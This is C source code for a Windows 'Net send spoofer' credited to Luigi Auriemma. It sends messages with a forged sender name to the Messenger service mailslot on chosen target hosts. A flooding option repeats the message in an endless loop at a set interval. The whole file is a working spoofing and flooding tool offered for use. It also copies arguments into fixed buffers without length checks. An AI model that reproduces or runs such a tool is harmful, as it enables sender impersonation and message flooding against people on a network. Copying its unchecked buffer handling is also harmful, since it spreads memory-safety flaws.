/*
    Copyright 2005,2006 Luigi Auriemma

    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307 USA

    http://www.gnu.org/licenses/gpl.txt
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <ctype.h>



#define VER     "0.2.1"
#define BUFFSZ  1024
#define MSGSZ   424
#define sleep   Sleep



int mycpy(u_char *dst, u_char *src);
char *ip2host(char *ipc);
void std_err(void);



int main(int argc, char *argv[]) {
    FILE    *fd;
    HANDLE  hnd;
    DWORD   len;
    int     i,
            msglen,
            flooding = -1;
    u_char  buff[BUFFSZ + 1],
            msg[MSGSZ + 1],
            *msgfile = NULL,
            *source,
            *dest,
            *destcomma,
            *p,
            *l;
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);


    setbuf(stdout, NULL);

    fputs("\n"
        "Net send spoofer "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s [options] <source> <dest[,dest1..N]> [message]\n"
            "\n"
            "-f FILE  loads the message from the file FILE\n"
            "-x MS    flooding, will be sent a message each MS milliseconds\n"
            "\n", argv[0]);
        exit(1);
    }

    for(i = 1; i < argc; i++) {
        if(argv[i][0] != '-') break;
        switch(argv[i][1]) {
            case 'f': msgfile  = argv[++i];         break;
            case 'x': flooding = atoi(argv[++i]);   break;
            default: {
                printf("\nError: wrong command-line argument (%s)\n\n", argv[i]);
                exit(1);
                } break;
        }
    }

    if((argc - i) < 2) {
        printf("\nError: you have not specified the source and destination hosts\n\n");
        exit(1);
    }

    source = argv[i++];
    dest   = argv[i++];

    p = msg;
    if(argc - i) {
        while(i < argc) {
            p += mycpy(p, argv[i]);
            *(p - 1) = ' ';
            i++;
        }
        *(p - 1) = 0;
    } else if(msgfile) {
        printf("- open file %s\n", msgfile);
        fd = fopen(msgfile, "rb");
        if(!fd) std_err();
        msglen = fread(p, 1, sizeof(msg) - 1, fd);
        p[msglen] = 0;
        fclose(fd);
    } else {
        msglen = MSGSZ;
        fputs("- type your message and then put a single dot (.) for sending it:\n", stdout);
        fflush(stdin);
        while(fgets(p, msglen, stdin)) {
            for(l = p; *l && (*l != '\n') && (*l != '\r'); l++);
            *l = 0;
            if(!strcmp(p, ".")) break;
            p = l;
            *p++ = '\r';
            *p++ = '\n';
            msglen = MSGSZ - (p - msg);
        }
        *p = 0;
    }

redo:
    destcomma = strchr(dest, ',');
    if(destcomma) *destcomma = 0;
    dest = ip2host(dest);

    sprintf(buff, "\\\\%s\\MAILSLOT\\messngr", dest);

    hnd = CreateFile(
        buff,
        GENERIC_WRITE,
        FILE_SHARE_READ,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL);

    p = buff;
    p += mycpy(p, source);
    p += mycpy(p, dest);
    p += mycpy(p, msg);

sendmsg:
    WriteFile(
        hnd,
        buff,
        (DWORD)(p - buff),
        &len,
        NULL);

    if(flooding >= 0) {
        fputc('.', stdout);
        sleep(flooding);
        goto sendmsg;
    }

    printf("- spoofed message sent to %s\n", dest);
    CloseHandle(hnd);

    if(destcomma) {
        dest = destcomma + 1;
        goto redo;
    }

    return(0);
}



int mycpy(u_char *dst, u_char *src) {
    u_char  *base = dst;

    while(*src) {
        *dst++ = *src++;
    }
    *dst++ = 0;
    return(dst - base);
}



char *ip2host(char *ipc) {
    struct  hostent *h;
    u_int   ip;

    if(isalpha(ipc[0])) return(ipc);
    ip = inet_addr(ipc);
    if(ip == INADDR_NONE) return(ipc);
    h = gethostbyaddr((u_char *)&ip, 4, AF_INET);
    if(!h) return(ipc);
    return(h->h_name);
}



void std_err(void) {
    perror("\nError");
    exit(1);
}


